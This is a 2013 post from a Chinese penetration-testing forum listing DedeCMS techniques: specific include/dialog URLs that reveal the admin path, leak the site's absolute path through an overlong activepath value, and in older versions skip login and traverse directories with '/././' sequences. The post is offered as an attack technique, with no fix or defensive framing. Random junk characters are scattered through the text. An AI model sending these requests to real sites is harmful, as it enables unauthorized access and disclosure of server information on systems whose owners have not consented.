找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2094|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
! q7 a% Q; Q. o( n& C' R
0 b1 v4 a7 I& Y: f/ z员帐号,新版本的就直接转向了后台.
6 ]2 s% i, Y3 V* p7 |0 p, F$ h  i6 Y( Y! s
! @5 j- G, w4 Y% c1 [2.include/dialog/config.php会爆出后台管理路径
& ]% ^; \2 D$ V! U  F. }. h6 W3 y5 r/ D" e2 i! n. c5 T" q
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录( u" f/ h2 R0 f. M) l/ n

( g; Y1 \* j: X; h4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径., J+ f1 R- ^) }( H- q; H: Q

$ c  q1 q4 e9 d/ M( f0 B* {. O- r5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
4 }4 i- N8 J- X) j
! R( {- k/ g2 A到根目录去.不过这些版本的访问地址有些不同." c9 `2 V: f: q7 y2 V0 |' R
地址为require/dialog/select_soft.php?activepath=/././././././././
  _0 G$ e! K1 \+ L* U  m+ U2 ^/ q
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
1 M' a, h5 v0 i0 t0 g, b2 d存在相同问题的文件还有3 D5 }$ M2 _2 \9 n" ?  ^
include\dialog\select_images.php- d, d6 n% t" r9 c# S! I
include\dialog\select_media.php
/ f. x5 I8 m! Z' Dinclude\dialog\select_templets.php​" A' m; P/ G8 i( r8 ?! D' N
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表